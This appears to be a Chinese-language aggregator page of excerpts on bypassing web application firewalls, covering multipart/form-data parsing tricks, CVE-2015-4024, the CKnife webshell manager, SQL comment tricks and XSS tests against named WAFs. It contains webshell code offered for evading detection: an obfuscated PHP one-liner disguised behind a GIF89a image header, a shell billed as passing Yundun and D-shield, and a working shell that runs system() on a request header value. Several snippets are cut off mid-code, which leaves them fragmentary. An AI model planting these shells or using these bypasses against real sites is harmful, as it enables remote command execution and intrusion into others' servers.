multipart/form-data PHP和Java通用的WAF绕过方法

依旧是multipart/form-data,去年的时候说道了利用PHP的特性去绕过WAF.轻松绕各种WAF的POST注入、跨站防御(比如安全狗)
原文简单的描述了PHP在处理POST请求的时候会解析multipart/form-data的内容。
那么这个multipart/form-data到底是个啥呢?

PHP绕过各种waf技巧-CVE-2015-4024

今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,中文版:http://drops.wooyun.org/papers/6077,英文版 :https://bugs.php.net/bug.php?id=69364。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS。事实上该漏洞还有其他非dos的利用价值,其中之一,就是绕过当前各种云WAF的文件上传防御策略。

CKnife java版本的中国菜刀 可过各种waf狗

CKnife java版本菜刀

原创过狗php一句话

GIF89a
<?
$ran = 'cmFuZ2U=';
$ran1 = 'ba'.'se'.'64'.'_decode';
$int = $ran1($ran);
$int1 = $int(0,200);
$ch = 'c&#39

waf绕过的技巧

研究过国内外的waf。分享一些 奇淫绝技。

一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。

Mysql

过云盾、D盾各种盾php shell

<?php
 
//过云盾、D盾各种盾shell
$id = $_GET['id'];
//debug
echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
$s = '';

WAF的XSS绕过姿势

由于应用防火墙的广泛使用,实验测试WAF抵御xss攻击的能力变的很有必要。当然所有的实验就是为了证明厂商要从根源上杜绝漏洞,不能躺在WAF上高枕无忧。

实验测试的对象是一些流行的WAF 例如F5 Big IP、Imperva Incapsula、AQTRONIX WebKnight、PHP-IDS、Mod-Security、Sucuri、QuickDefense、Barracuda WAF 他们都在测试中被绕过。

轻松绕过任意Waf的Webshell

<?php
$b="";
$a = array_values($_SERVER);
 
$l=system($b.$a[6]);
echo  $l;
 
 ?>
<?php
 
$b =